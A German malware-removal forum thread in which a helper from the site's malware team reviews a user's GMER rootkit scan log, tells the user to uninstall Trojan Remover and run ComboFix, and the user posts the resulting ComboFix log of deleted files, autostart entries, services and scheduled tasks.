.text     C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread                                                                                                                                                               00000000750d2bbe 5 bytes JMP 000000016fbc1bb0
.text     C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection                                                                                                                                                                            000000007730fbf0 5 bytes JMP 000000016fbc19d0
.text     C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory                                                                                                                                                                          000000007730fdb4 1 byte JMP 000000016fbc15f0
.text     C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2                                                                                                                                                                      000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c}
.text     C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW                                                                                                                                                                     0000000074fd117b 5 bytes JMP 000000016fbc1760
.text     C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread                                                                                                                                                                             00000000750d2bbe 5 bytes JMP 000000016fbc1bb0
.text     C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe[2916] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection                                                                                                                                                 0000000077160130 5 bytes JMP 00000000772c0128
.text     C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe[2916] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory                                                                                                                                               0000000077160250 5 bytes JMP 00000000772c0018
.text     C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe[2916] C:\Windows\system32\kernel32.dll!CreateProcessInternalW                                                                                                                                          0000000076f0a600 5 bytes JMP 00000000772c00a0
.text     C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe[2916] C:\Windows\system32\KERNELBASE.dll!ResumeThread                                                                                                                                                  000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0
.text     C:\Program Files\NVIDIA Corporation\Display\nvtray.exe[3788] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection                                                                                                                                                    0000000077160130 5 bytes JMP 00000000772c0128
.text     C:\Program Files\NVIDIA Corporation\Display\nvtray.exe[3788] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory                                                                                                                                                  0000000077160250 5 bytes JMP 00000000772c0018
.text     C:\Program Files\NVIDIA Corporation\Display\nvtray.exe[3788] C:\Windows\system32\kernel32.dll!CreateProcessInternalW                                                                                                                                             0000000076f0a600 5 bytes JMP 00000000772c00a0
.text     C:\Program Files\NVIDIA Corporation\Display\nvtray.exe[3788] C:\Windows\system32\KERNELBASE.dll!ResumeThread                                                                                                                                                     000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0
.text     C:\Windows\System32\svchost.exe[3964] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection                                                                                                                                                                           0000000077160130 5 bytes JMP 0000000177100128
.text     C:\Windows\System32\svchost.exe[3964] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory                                                                                                                                                                         0000000077160250 5 bytes JMP 0000000177100018
.text     C:\Windows\System32\svchost.exe[3964] C:\Windows\system32\kernel32.dll!CreateProcessInternalW                                                                                                                                                                    0000000076f0a600 5 bytes JMP 00000000771000a0
.text     C:\Windows\System32\svchost.exe[3964] C:\Windows\system32\KERNELBASE.dll!ResumeThread                                                                                                                                                                            000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0
.text     C:\Program Files\Windows Media Player\wmpnetwk.exe[3240] C:\Windows\system32\kernel32.dll!CreateProcessInternalW                                                                                                                                                 0000000076f0a600 5 bytes JMP 00000000772c00a0
.text     C:\Windows\system32\wuauclt.exe[4160] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection                                                                                                                                                                           0000000077160130 5 bytes JMP 00000000772c0128
.text     C:\Windows\system32\wuauclt.exe[4160] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory                                                                                                                                                                         0000000077160250 5 bytes JMP 00000000772c0018
.text     C:\Windows\system32\wuauclt.exe[4160] C:\Windows\system32\kernel32.dll!CreateProcessInternalW                                                                                                                                                                    0000000076f0a600 5 bytes JMP 00000000772c00a0
.text     C:\Windows\system32\wuauclt.exe[4160] C:\Windows\system32\KERNELBASE.dll!ResumeThread                                                                                                                                                                            000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0

---- Kernel code sections - GMER 2.1 ----

INITKDBG  C:\Windows\system32\ntoskrnl.exe                                                                                                                                                                                                                                 suspicious modification
INITKDBG  C:\Windows\system32\ntoskrnl.exe                                                                                                                                                                                                                                 suspicious modification
---- Processes - GMER 2.1 ----

Library   C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{10C73F7D-C192-4DD9-B951-F4037A142952}\mpengine.dll (*** suspicious ***) @ C:\Windows\System32\svchost.exe [3964] (Microsoft Malware Protection Engine/Microsoft Corporation)(2015-09-19 14:16:43)  000007feeda50000

---- EOF - GMER 2.1 ----
         
__________________


Alt 20.09.2015, 19:39   #3
burningice
/// Malwareteam
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw





Ich habe dein Thema in Arbeit und melde mich so schnell als möglich mit weiteren Anweisungen.

Bitte beachte, dass alle meine Antworten zuerst von einem Ausbilder freigegeben werden müssen, bevor ich diese hier posten darf. Dies garantiert, dass Du Hilfe von einem ausgebildeten Helfer bekommst.

Ich bedanke mich für deine Geduld
__________________
__________________

Alt 20.09.2015, 21:24   #4
burningice
/// Malwareteam
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



Schritt 1
Geh in die Systemsteuerung -> Programme und Funktionen und deinstalliere folgendes Programm:
  • Trojan Remover


Schritt 2
Scan mit Combofix
WARNUNG an die MITLESER:
Combofix sollte ausschließlich ausgeführt werden, wenn dies von einem Teammitglied angewiesen wurde!

Downloade dir bitte Combofix vom folgenden Downloadspiegel: Link
  • WICHTIG: Speichere Combofix auf deinem Desktop.
  • Deaktiviere bitte alle deine Antivirensoftware sowie Malware/Spyware Scanner. Diese können Combofix bei der Arbeit stören. Combofix meckert auch manchmal trotzdem noch, das kannst du dann ignorieren, mir aber bitte mitteilen.
  • Starte die Combofix.exe und folge den Anweisungen auf dem Bildschirm.
  • Während Combofix läuft bitte nicht am Computer arbeiten, die Maus bewegen oder ins Combofixfenster klicken!
  • Wenn Combofix fertig ist, wird es ein Logfile erstellen.
  • Bitte poste die C:\Combofix.txt in deiner nächsten Antwort (möglichst in CODE-Tags).
Hinweis: Solltest du nach dem Neustart folgende Fehlermeldung erhalten
Es wurde versucht, einen Registrierungsschlüssel einem ungültigen Vorgang zu unterziehen, der zum Löschen markiert wurde.
starte den Rechner einfach neu. Dies sollte das Problem beheben.



Bitte poste in deiner nächsten Antwort also:
  • Logfile von Combofix
__________________
Mfg,
Rafael

~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~

Unterstütze uns mit einer Spende
......... Lob, Kritik oder Wünsche .........
.......... Folge uns auf Facebook ..........

Alt 21.09.2015, 17:57   #5
Zympop
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



Code:
ATTFilter
ComboFix 15-09-21.01 - Kenny G 21.09.2015  18:17:02.1.2 - x64
ausgeführt von:: c:\users\Kenny G\Downloads\ComboFix.exe
 * Neuer Wiederherstellungspunkt wurde erstellt
.
.
((((((((((((((((((((((((((((((((((((   Weitere Löschungen   ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\www.weekweek.net (2).url
c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\www.weekweek.net (3).url
c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\www.weekweek.net.url
c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\REAL HIPHOP ?? ???? ????????????????????? - ???? (2).URL . . . . Nicht in der Lage zu löschen
c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Recent\REAL HIPHOP ?? ???? ????????????????????? - ????.URL . . . . Nicht in der Lage zu löschen
.
.
(((((((((((((((((((((((   Dateien erstellt von 2015-08-21 bis 2015-09-21  ))))))))))))))))))))))))))))))
.
.
2015-09-21 16:26 . 2015-09-21 16:26	--------	d-----w-	c:\users\UpdatusUser\AppData\Local\temp
2015-09-21 16:26 . 2015-09-21 16:26	--------	d-----w-	c:\users\Tabea Studium\AppData\Local\temp
2015-09-21 16:26 . 2015-09-21 16:26	--------	d-----w-	c:\users\eLoot\AppData\Local\temp
2015-09-21 16:26 . 2015-09-21 16:26	--------	d-----w-	c:\users\Default\AppData\Local\temp
2015-09-20 17:15 . 2015-09-20 17:35	--------	d-----w-	C:\FRST
2015-09-20 15:43 . 2015-09-20 17:40	113880	----a-w-	c:\windows\system32\drivers\MBAMSwissArmy.sys
2015-09-20 15:42 . 2015-09-20 15:42	--------	d-----w-	c:\program files (x86)\ Malwarebytes Anti-Malware 
2015-09-20 15:42 . 2015-06-18 06:41	63704	----a-w-	c:\windows\system32\drivers\mwac.sys
2015-09-20 15:42 . 2015-06-18 06:41	109272	----a-w-	c:\windows\system32\drivers\mbamchameleon.sys
2015-09-20 15:42 . 2015-06-18 06:41	25816	----a-w-	c:\windows\system32\drivers\mbam.sys
2015-09-19 15:25 . 2015-09-21 16:10	--------	d-----w-	c:\program files (x86)\Trojan Remover
2015-09-19 15:11 . 2015-09-20 15:29	584	----a-w-	C:\task.vbs
2015-09-19 14:17 . 2015-09-19 14:48	--------	d-----w-	c:\windows\system32\MRT
2015-09-19 14:16 . 2015-09-16 03:43	11062400	----a-w-	c:\programdata\Microsoft\Windows Defender\Definition Updates\{10C73F7D-C192-4DD9-B951-F4037A142952}\mpengine.dll
2015-09-19 14:16 . 2015-09-19 14:16	--------	d-----w-	c:\windows\system32\EventProviders
2015-09-19 10:25 . 2015-09-19 10:25	--------	d-----r-	C:\MSOCache
2015-09-19 10:24 . 2015-09-19 10:24	--------	d-----w-	c:\users\Kenny G\AppData\Local\Disc_Soft_Ltd
2015-09-19 10:21 . 2015-09-19 10:21	30264	----a-w-	c:\windows\system32\drivers\dtlitescsibus.sys
2015-09-19 10:21 . 2015-09-19 10:24	--------	d-----w-	c:\users\Kenny G\AppData\Roaming\DAEMON Tools Lite
2015-09-19 10:21 . 2015-09-19 10:23	--------	d-----w-	c:\program files\DAEMON Tools Lite
2015-09-19 10:21 . 2015-09-19 10:21	--------	d-----w-	c:\programdata\DAEMON Tools Lite
2015-09-19 10:15 . 2015-09-19 10:15	--------	d-----w-	c:\users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913---
2015-09-19 10:12 . 2015-09-19 23:26	--------	d-----w-	c:\program files (x86)\Could not connect. Error code = 0x-1442657579---
2015-09-19 10:06 . 2015-09-19 10:12	--------	d-----w-	c:\programdata\Microsoft Toolkit
2015-09-19 09:06 . 2015-09-19 09:06	--------	d-----w-	c:\users\Kenny G\AppData\Local\Microsoft Help
2015-09-19 09:06 . 2015-09-19 14:06	--------	d-----w-	c:\programdata\Microsoft Help
2015-09-01 18:31 . 2015-09-01 18:31	--------	d-----w-	C:\Backup
2015-08-29 18:33 . 2015-08-29 18:34	--------	d-----w-	c:\programdata\Package Cache
.
.
.
((((((((((((((((((((((((((((((((((((   Find3M Bericht   ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2015-09-12 10:16 . 2014-01-15 18:58	282296	----a-w-	c:\windows\SysWow64\PnkBstrB.exe
2015-09-12 10:16 . 2014-01-15 18:58	282296	----a-w-	c:\windows\SysWow64\PnkBstrB.xtr
2015-09-12 10:14 . 2014-01-15 18:58	215128	----a-w-	c:\windows\SysWow64\PnkBstrB.ex0
2015-08-26 16:37 . 2009-10-14 05:12	134753440	----a-w-	c:\windows\system32\MRT.exe
2015-08-19 09:53 . 2015-08-19 09:53	297904	----a-w-	c:\windows\system32\drivers\avgidsha.sys
2015-08-19 09:52 . 2015-08-19 09:52	313264	----a-w-	c:\windows\system32\drivers\avgidsdrivera.sys
2015-08-13 00:23 . 2013-10-05 07:44	778440	----a-w-	c:\windows\SysWow64\FlashPlayerApp.exe
2015-08-13 00:23 . 2013-10-05 07:44	142536	----a-w-	c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2015-08-07 09:33 . 2015-08-07 09:34	422400	----a-w-	c:\windows\system32\LavasoftTcpService64.dll
2015-08-07 09:33 . 2015-08-07 09:33	342016	----a-w-	c:\windows\SysWow64\LavasoftTcpService.dll
2015-08-04 09:32 . 2015-08-04 09:32	300464	----a-w-	c:\windows\system32\drivers\avgtdia.sys
2015-08-04 09:32 . 2015-08-04 09:32	250800	----a-w-	c:\windows\system32\drivers\avgmfx64.sys
2015-07-09 05:11 . 2015-03-20 10:20	77760	----a-w-	c:\windows\system32\drivers\avgfwd6a.sys
2010-06-02 04:22 . 2010-06-02 04:22	89944	----a-w-	c:\program files (x86)\DSETUP.dll
2010-06-02 04:22 . 2010-06-02 04:22	537432	----a-w-	c:\program files (x86)\DXSETUP.exe
2010-06-02 04:22 . 2010-06-02 04:22	1801048	----a-w-	c:\program files (x86)\dsetup32.dll
.
.
((((((((((((((((((((((((((((   Autostartpunkte der Registrierung   ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1EldosIconOverlay]
@="{56D36CD8-63C4-425D-B03D-CC30C1711EA4}"
[HKEY_CLASSES_ROOT\CLSID\{56D36CD8-63C4-425D-B03D-CC30C1711EA4}]
2012-04-09 15:27	158224	----a-w-	c:\windows\SysWOW64\CbFsMntNtf3.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EldosIconOverlay]
@="{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}"
[HKEY_CLASSES_ROOT\CLSID\{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}]
2012-04-09 15:27	158224	----a-w-	c:\windows\SysWOW64\CbFsMntNtf3.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DAEMON Tools Lite Automount"="c:\program files\DAEMON Tools Lite\DTAgent.exe" [2015-06-18 4468056]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"AVG_UI"="c:\program files (x86)\AVG\AVG2015\avgui.exe" [2015-08-24 3775912]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\run-]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 LavasoftTcpService;LavasoftTcpService;c:\program files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe;c:\program files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [x]
R2 MBAMService;MBAMService;c:\program files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe;c:\program files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [x]
R2 SearchProtectionService;IE Search Set;c:\program files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe;c:\program files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]
R3 Sony PC Companion;Sony PC Companion;c:\program files (x86)\Sony\Sony PC Companion\PCCService.exe;c:\program files (x86)\Sony\Sony PC Companion\PCCService.exe [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
S0 AVGIDSHA;AVGIDSHA;c:\windows\system32\DRIVERS\avgidsha.sys;c:\windows\SYSNATIVE\DRIVERS\avgidsha.sys [x]
S0 Avgloga;AVG Logging Driver;c:\windows\system32\DRIVERS\avgloga.sys;c:\windows\SYSNATIVE\DRIVERS\avgloga.sys [x]
S0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield;c:\windows\system32\DRIVERS\avgmfx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgmfx64.sys [x]
S0 Avgrkx64;AVG Anti-Rootkit Driver;c:\windows\system32\DRIVERS\avgrkx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgrkx64.sys [x]
S1 Avgdiska;AVG Disk Driver;c:\windows\system32\DRIVERS\avgdiska.sys;c:\windows\SYSNATIVE\DRIVERS\avgdiska.sys [x]
S1 Avgfwfd;AVG network filter service;c:\windows\system32\DRIVERS\avgfwd6a.sys;c:\windows\SYSNATIVE\DRIVERS\avgfwd6a.sys [x]
S1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\DRIVERS\avgidsdrivera.sys;c:\windows\SYSNATIVE\DRIVERS\avgidsdrivera.sys [x]
S1 Avgldx64;AVG AVI Loader Driver;c:\windows\system32\DRIVERS\avgldx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgldx64.sys [x]
S1 Avgtdia;AVG TDI Driver;c:\windows\system32\DRIVERS\avgtdia.sys;c:\windows\SYSNATIVE\DRIVERS\avgtdia.sys [x]
S1 cbfs3;cbfs3;c:\windows\system32\drivers\cbfs3.sys;c:\windows\SYSNATIVE\drivers\cbfs3.sys [x]
S2 avgfws;AVG Firewall;c:\program files (x86)\AVG\AVG2015\avgfws.exe;c:\program files (x86)\AVG\AVG2015\avgfws.exe [x]
S2 AVGIDSAgent;AVGIDSAgent;c:\program files (x86)\AVG\AVG2015\avgidsagent.exe;c:\program files (x86)\AVG\AVG2015\avgidsagent.exe [x]
S2 avgwd;AVG WatchDog;c:\program files (x86)\AVG\AVG2015\avgwdsvc.exe;c:\program files (x86)\AVG\AVG2015\avgwdsvc.exe [x]
S2 CGVPNCliService;CyberGhost 5 Client Service;c:\program files\CyberGhost 5\Service.exe;c:\program files\CyberGhost 5\Service.exe [x]
S2 NIHardwareService;NIHardwareService;c:\program files\Common Files\Native Instruments\Hardware\NIHardwareService.exe;c:\program files\Common Files\Native Instruments\Hardware\NIHardwareService.exe [x]
S2 NvStreamSvc;NVIDIA Streamer Service;c:\program files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe;c:\program files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [x]
S2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [x]
S2 WtuSystemSupport;WtuSystemSupport;c:\program files (x86)\AVG Web TuneUp\WtuSystemSupport.exe;c:\program files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [x]
S2 zuroluxy;Background Type;c:\program files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs;c:\program files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [x]
S3 Disc Soft Lite Bus Service;Disc Soft Lite Bus Service;c:\program files\DAEMON Tools Lite\DiscSoftBusService.exe;c:\program files\DAEMON Tools Lite\DiscSoftBusService.exe [x]
S3 dtlitescsibus;DAEMON Tools Lite Virtual SCSI Bus;c:\windows\system32\DRIVERS\dtlitescsibus.sys;c:\windows\SYSNATIVE\DRIVERS\dtlitescsibus.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
S3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);c:\windows\system32\drivers\nvvad64v.sys;c:\windows\SYSNATIVE\drivers\nvvad64v.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2015-09-16 18:24	997704	----a-w-	c:\program files (x86)\Google\Chrome\Application\45.0.2454.93\Installer\chrmstp.exe
.
Inhalt des "geplante Tasks" Ordners
.
2015-09-03 c:\windows\Tasks\Adobe Flash Player PPAPI Notifier.job
- c:\windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe [2015-08-13 00:23]
.
2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51]
.
2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51]
.
2015-09-21 c:\windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51]
.
2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51]
.
2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51]
.
2015-09-03 c:\windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51]
.
2015-09-21 c:\windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-02-16 23:51]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon1]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41}]
2012-05-02 12:10	1721856	----a-w-	c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon2]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42}]
2012-05-02 12:10	1721856	----a-w-	c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon3]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43}]
2012-05-02 12:10	1721856	----a-w-	c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon4]
@="{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}"
[HKEY_CLASSES_ROOT\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44}]
2012-05-02 12:10	1721856	----a-w-	c:\program files (x86)\Wuala OverlayIcons\OverlayIcon.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1EldosIconOverlay]
@="{56D36CD8-63C4-425D-B03D-CC30C1711EA4}"
[HKEY_CLASSES_ROOT\CLSID\{56D36CD8-63C4-425D-B03D-CC30C1711EA4}]
2012-04-09 15:27	190480	----a-w-	c:\windows\System32\CbFsMntNtf3.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EldosIconOverlay]
@="{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}"
[HKEY_CLASSES_ROOT\CLSID\{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}]
2012-04-09 15:27	190480	----a-w-	c:\windows\System32\CbFsMntNtf3.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Nvtmru"="c:\program files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe" [2013-10-18 1028384]
.
------- Zusätzlicher Suchlauf -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = hxxp://www.google.com
mStart Page = about:blank
mLocal Page = c:\windows\SysWOW64\blank.htm
mDefault_Page_URL = hxxp://www.google.com
uSearchAssistant = hxxp://www.google.com
IE: Free YouTube Download - c:\program files (x86)\Common Files\DVDVideoSoft\plugins\freeytvdownloader.htm
IE: {{07BA1DA9-F501-4796-8728-74D1B91A6CD5} - c:\program files (x86)\PokerStars.EU\PokerStarsUpdate.exe
Trusted Zone: localhost
Trusted Zone: webcompanion.com
TCP: DhcpNameServer = 192.168.2.1
FF - ProfilePath - c:\users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\
FF - prefs.js: browser.startup.homepage - hxxps://www.malwarebytes.org/restorebrowser/
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKCU-Run-Web Companion - c:\program files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe
Wow6432Node-HKU-Default-Run-Bitdefender-Geldbörse-Agent - c:\program files\Bitdefender\Bitdefender\pmbxag.exe
Wow6432Node-HKU-Default-Run-Bitdefender-Geldbörse - c:\program files\Bitdefender\Bitdefender\pwdmanui.exe
Wow6432Node-HKU-Default-Run-Bitdefender-Geldbörse-Anwendungs-Agent - c:\program files\Bitdefender\Bitdefender\antispam32\bdapppassmgr.exe
c:\users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopnotes.lnk - (no file)
Toolbar-Locked - (no file)
AddRemove-Native Instruments Audio 2 DJ Driver - c:\programdata\{033B4844-E9C3-45D2-88D9-34DDF3F91100}\Audio 2 DJ Driver Setup PC.exe
AddRemove-Native Instruments Audio 4 DJ Driver - c:\programdata\{4682E4CB-7209-4099-8AA1-580ABCCCE731}\Audio 4 DJ Driver Setup PC.exe
AddRemove-Native Instruments Audio 8 DJ Driver - c:\programdata\{D2030082-F62A-402A-9456-8009276FD896}\Audio 8 DJ Driver Setup PC.exe
AddRemove-Native Instruments Controller Editor - c:\programdata\{07D05344-6233-4934-88BF-C7E4EEFF9D28}\Controller Editor Setup PC.exe
AddRemove-Native Instruments Service Center - c:\programdata\{90D8CE90-3E6B-4034-A281-BC9F19B60A5B}\Service Center Setup PC.exe
AddRemove-Native Instruments Traktor - c:\programdata\{47803536-1938-4D3F-86D6-F4876B645542}\Traktor Setup PC.exe
AddRemove-Native Instruments Traktor 2 - c:\programdata\{9E7BD413-9B42-4EEC-96F4-6FF3CF9791A2}\Traktor 2 Setup PC.exe
AddRemove-Native Instruments Traktor Audio 2 Driver - c:\programdata\{0CC85DFF-E70A-4AB0-968A-F1F98F4D0C67}\Traktor Audio 2 Driver Setup PC.exe
AddRemove-Native Instruments Traktor Audio 2 MK2 Driver - c:\programdata\{B3478C15-588A-4968-AD66-76AA98803A28}\Traktor Audio 2 MK2 Driver Setup PC.exe
AddRemove-Native Instruments Traktor Audio 6 Driver - c:\programdata\{662EAAEC-9E9A-4C69-A658-884E51E909BB}\Traktor Audio 6 Driver Setup PC.exe
AddRemove-Native Instruments Traktor Kontrol D2 Driver - c:\programdata\{8D4C602D-E844-4297-BB00-303F1AFBDCBE}\Traktor Kontrol D2 Driver Setup PC.exe
AddRemove-Native Instruments Traktor Kontrol F1 Driver - c:\programdata\{219191E6-6846-4329-889D-7956C487D9A6}\Traktor Kontrol F1 Driver Setup PC.exe
AddRemove-Native Instruments Traktor Kontrol S2 Driver - c:\programdata\{9F570B21-E27A-40BE-A508-292899A7D042}\Traktor Kontrol S2 Driver Setup PC.exe
AddRemove-Native Instruments Traktor Kontrol S2 MK2 Driver - c:\programdata\{AF79C86B-2321-4D47-A168-2A24BA2B6A73}\Traktor Kontrol S2 MK2 Driver Setup PC.exe
AddRemove-Native Instruments Traktor Kontrol S4 Driver - c:\programdata\{B7C85E99-2AC6-455D-B4D1-752A56403757}\Traktor Kontrol S4 Driver Setup PC.exe
AddRemove-Native Instruments Traktor Kontrol S4 MK2 Driver - c:\programdata\{57B31BE2-3175-4425-9722-D2AC5F68C7BD}\Traktor Kontrol S4 MK2 Driver Setup PC.exe
AddRemove-Native Instruments Traktor Kontrol S8 Driver - c:\programdata\{AD2628D6-C822-4033-AC55-33D833EF2EC9}\Traktor Kontrol S8 Driver Setup PC.exe
